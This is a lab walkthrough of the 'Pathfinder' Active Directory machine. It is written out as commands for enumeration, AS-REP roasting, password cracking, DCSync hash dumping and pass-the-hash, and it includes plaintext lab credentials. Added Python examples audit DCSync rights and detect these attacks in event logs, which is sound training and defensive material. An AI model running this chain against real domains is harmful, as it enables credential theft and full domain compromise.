
Pathfinder
31st January 2020 / Document No. D20.101.28

Prepared By: egotisticalSW

Machine Author(s): egotisticalSW

Difficulty: Easy

Classification: Official
Enumeration
masscan -p 1-65535 10.10.10.30 -e tun0 --rate=1000

Port 88 is typically associated with Kerberos and port 389 with LDAP, which indicates that this is a
Domain Controller. We note that WinRM is enabled on port 5985.
Enumeration
Using the credentials obtained on a previous machine, sandra:Password1234!, we can attempt to
enumerate Active Directory. We can achieve this with BloodHound. There is a Python BloodHound
ingestor, which can be found here. It can also be installed using pip:

pip install bloodhound

bloodhound-python -d megacorp.local -u sandra -p "Password1234!" -gc pathfinder.megacorp.local -c all -ns 10.10.10.30

The json files should now be in the working directory, ready to be imported into BloodHound.

Installing and Starting BloodHound

First, we need to install neo4j and BloodHound.

apt install neo4j


apt install bloodhound

Next, we need to configure the neo4j service. We can accomplish this by running the following
command:

neo4j console

You will then be prompted to change your password. Next, we start BloodHound:

bloodhound --no-sandbox

Ensure you have a connection to the database, indicated by a ✔ symbol at the top of the three
input fields. The default username is neo4j, with the password set previously.

Opening BloodHound, we can drag and drop the .json files, and BloodHound will begin to analyze
the data. We can select various queries, of which two very useful ones are Shortest Paths to
High Value Targets and Find Principals with DCSync Rights.
The latter query returns the following:

We can see that the svc_bes account has the GetChangesAll privilege on the domain. This means the
account has the ability to request replication data from the domain controller and obtain sensitive
information such as user password hashes.
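The "Find Principals with DCSync Rights" query above is an ACL check that a defender can also run offline, straight from the collector output, to audit which principals are replication-capable before anyone abuses it. The following is an added example written for this write-up, not code from the write-up or from the BloodHound project. It assumes the layout that bloodhound-python writes to domains.json (a top-level "data" list whose entries carry "Properties" and "Aces", each ACE having "PrincipalSID", "PrincipalType" and "RightName"); the sample document, SIDs and RIDs are constructed for the demonstration.

```python
"""Offline audit of BloodHound collector output for DCSync-capable principals.

Example code for this write-up (hypothetical): it parses the domains.json that
bloodhound-python writes and reports every principal whose ACEs on the domain
object are enough to replicate directory data. The JSON layout is assumed from
the collector's output format; the sample document below is constructed.
"""
import json

# A single one of these rights is enough to replicate the directory.
SUFFICIENT_RIGHTS = {"AllExtendedRights", "GenericAll"}
# These two only grant DCSync when a principal holds both of them.
REPLICATION_PAIR = {"GetChanges", "GetChangesAll"}

# Well-known RID suffixes that legitimately hold replication rights
# (Domain Admins, Domain Controllers, Enterprise Admins, Enterprise RODCs).
EXPECTED_RID_SUFFIXES = {"-512", "-516", "-519", "-498"}

# Constructed sample in the shape of bloodhound-python's domains.json (not real data).
SAMPLE_DOMAINS_JSON = json.dumps({
    "data": [
        {
            "Properties": {"name": "MEGACORP.LOCAL", "domain": "MEGACORP.LOCAL"},
            "Aces": [
                {"PrincipalSID": "S-1-5-21-1-1-1-512", "PrincipalType": "Group",
                 "RightName": "GetChanges", "IsInherited": False},
                {"PrincipalSID": "S-1-5-21-1-1-1-512", "PrincipalType": "Group",
                 "RightName": "GetChangesAll", "IsInherited": False},
                # A plain user account holding both replication rights.
                {"PrincipalSID": "S-1-5-21-1-1-1-1105", "PrincipalType": "User",
                 "RightName": "GetChangesAll", "IsInherited": False},
                {"PrincipalSID": "S-1-5-21-1-1-1-1105", "PrincipalType": "User",
                 "RightName": "GetChanges", "IsInherited": False},
                # A user with only GetChanges: not sufficient on its own.
                {"PrincipalSID": "S-1-5-21-1-1-1-1106", "PrincipalType": "User",
                 "RightName": "GetChanges", "IsInherited": False},
                {"PrincipalSID": "S-1-5-21-1-1-1-519", "PrincipalType": "Group",
                 "RightName": "GenericAll", "IsInherited": False},
            ],
        }
    ],
    "meta": {"type": "domains", "count": 1, "version": 3},
})


def collect_rights(domains_doc):
    """Return {domain_name: {principal_sid: set(right_names)}} from a parsed domains.json."""
    rights = {}
    for dom in domains_doc.get("data", []):
        per_principal = rights.setdefault(dom["Properties"]["name"], {})
        for ace in dom.get("Aces", []):
            per_principal.setdefault(ace["PrincipalSID"], set()).add(ace["RightName"])
    return rights


def has_dcsync(right_names):
    """DCSync needs both replication rights, or a right that implies them."""
    return REPLICATION_PAIR <= right_names or bool(SUFFICIENT_RIGHTS & right_names)


def find_dcsync_principals(domains_json_text):
    """Return a sorted list of (domain, sid, expected) for every DCSync-capable principal.

    `expected` is True when the SID is one of the well-known groups that should
    hold the right, so reviewers can focus on the remaining entries.
    """
    findings = []
    for domain, per_principal in collect_rights(json.loads(domains_json_text)).items():
        for sid, names in per_principal.items():
            if has_dcsync(names):
                expected = any(sid.endswith(suffix) for suffix in EXPECTED_RID_SUFFIXES)
                findings.append((domain, sid, expected))
    return sorted(findings)


if __name__ == "__main__":
    for domain, sid, expected in find_dcsync_principals(SAMPLE_DOMAINS_JSON):
        print(f"{domain}: {sid} can DCSync [{'expected' if expected else 'REVIEW'}]")
```

Run against real collector output, the entries flagged REVIEW are the ones to reconcile against change records; a service account such as the one in this write-up would show up there, while Domain Admins and the DC computer accounts are reported as expected holders.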
Lateral Movement
It's worth checking whether Kerberos pre-authentication has been disabled for this account, which
would make it vulnerable to ASREPRoasting. We can check this using a tool such as Impacket's
GetNPUsers.

GetNPUsers.py megacorp.local/svc_bes -request -no-pass -dc-ip 10.10.10.30

We obtain the TGT ticket for svc_bes and save it to a file called hash. We can use Hashcat or
JTR in conjunction with rockyou.txt to obtain the plaintext password Sheffield19.

john hash --wordlist=/usr/share/wordlists/rockyou.txt

It is now possible to access the server as svc_bes using WinRM, and gain user.txt.

gem install evil-winrm


evil-winrm -i 10.10.10.30 -u svc_bes -p Sheffield19
Privilege Escalation
In order to leverage the GetChangesAll permission, we can use Impacket's secretsdump.py to
perform a DCSync attack and dump the NTLM hashes of all domain users.

secretsdump.py -dc-ip 10.10.10.30 MEGACORP.LOCAL/svc_bes:Sheffield19@10.10.10.30

Using the default domain administrator's NTLM hash, we can perform a pass-the-hash (PTH) attack to
gain elevated access to the system. For this, we can use Impacket's psexec.py.

psexec.py megacorp.local/administrator@10.10.10.30 -hashes <LM hash>:<NTLM hash>
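Both steps in this chain leave distinctive traces in the domain controller's Security log: the GetNPUsers request in the Lateral Movement section is a TGT issued with no pre-authentication (EventID 4768, Pre-Authentication Type 0, typically with RC4 ticket encryption 0x17), and the secretsdump DCSync above is a directory-object access (EventID 4662, Control Access mask 0x100) whose Properties carry the DS-Replication-Get-Changes control-access GUIDs, performed by an account that is not a domain controller. The following is an added example, not code from the write-up, implementing those two detection rules over constructed events. It assumes events arrive as dicts keyed by the EventData field names (TargetUserName, PreAuthType, TicketEncryptionType, IpAddress, SubjectUserName, AccessMask, Properties); the sample events are constructed.

```python
"""Detection rules for AS-REP roasting (4768) and DCSync (4662), run over
constructed Windows Security-log events.

Example code for this write-up (hypothetical): each event is a dict of the
EventData fields a SIEM would extract. The sample events are constructed.
"""

# Control-access-right GUIDs that appear in the 4662 Properties field when a
# principal replicates directory data (the rights DCSync relies on).
REPLICATION_GUIDS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}


def check_asrep_roast(ev):
    """4768 with pre-auth type 0 means a TGT was issued without pre-authentication.

    RC4 (0x17) ticket encryption is what the common roasting tooling asks for,
    so it raises the severity; AES tickets are still reported, at medium.
    """
    if ev.get("EventID") != 4768 or ev.get("PreAuthType") != "0":
        return None
    user = ev.get("TargetUserName", "")
    if user.endswith("$"):  # machine accounts are not roastable user accounts
        return None
    rc4 = ev.get("TicketEncryptionType", "").lower() == "0x17"
    return {"rule": "asrep_roast", "severity": "high" if rc4 else "medium",
            "user": user, "source": ev.get("IpAddress")}


def check_dcsync(ev):
    """4662 whose Properties carry a replication GUID, from a non-DC account."""
    if ev.get("EventID") != 4662 or ev.get("AccessMask") != "0x100":
        return None
    props = ev.get("Properties", "").lower()
    hit = [name for guid, name in REPLICATION_GUIDS.items() if guid in props]
    if not hit:
        return None
    subject = ev.get("SubjectUserName", "")
    if subject.endswith("$"):  # DC computer accounts replicate legitimately
        return None
    return {"rule": "dcsync", "severity": "critical", "user": subject, "rights": sorted(hit)}


RULES = (check_asrep_roast, check_dcsync)


def run_rules(events):
    """Apply every rule to every event and return the alerts raised, in order."""
    alerts = []
    for ev in events:
        for rule in RULES:
            alert = rule(ev)
            if alert:
                alerts.append(alert)
    return alerts


# Constructed sample events (field names follow the 4768/4662 EventData schema).
SAMPLE_EVENTS = [
    # Normal TGT request with timestamp pre-authentication and AES: no alert.
    {"EventID": 4768, "TargetUserName": "sandra", "PreAuthType": "2",
     "TicketEncryptionType": "0x12", "IpAddress": "::ffff:10.10.14.5"},
    # TGT issued with no pre-auth and RC4: the AS-REP roasting pattern.
    {"EventID": 4768, "TargetUserName": "svc_bes", "PreAuthType": "0",
     "TicketEncryptionType": "0x17", "IpAddress": "::ffff:10.10.14.5"},
    # Machine account without pre-auth: ignored by the rule.
    {"EventID": 4768, "TargetUserName": "PATHFINDER$", "PreAuthType": "0",
     "TicketEncryptionType": "0x12", "IpAddress": "::ffff:10.10.10.30"},
    # A domain controller replicating: legitimate.
    {"EventID": 4662, "SubjectUserName": "PATHFINDER$", "AccessMask": "0x100",
     "Properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}"},
    # A user account exercising both replication rights: the DCSync pattern.
    {"EventID": 4662, "SubjectUserName": "svc_bes", "AccessMask": "0x100",
     "Properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} "
                   "{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
]


if __name__ == "__main__":
    for alert in run_rules(SAMPLE_EVENTS):
        print(alert)
```

The 4662 rule depends on the "Directory Service Access" audit subcategory being enabled on the domain controllers with a SACL on the domain object; without it no 4662 is generated and the DCSync rule has nothing to match. Excluding accounts ending in "$" is a coarse allow-list; on a real estate, compare SubjectUserName against the DC computer accounts rather than the suffix alone.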
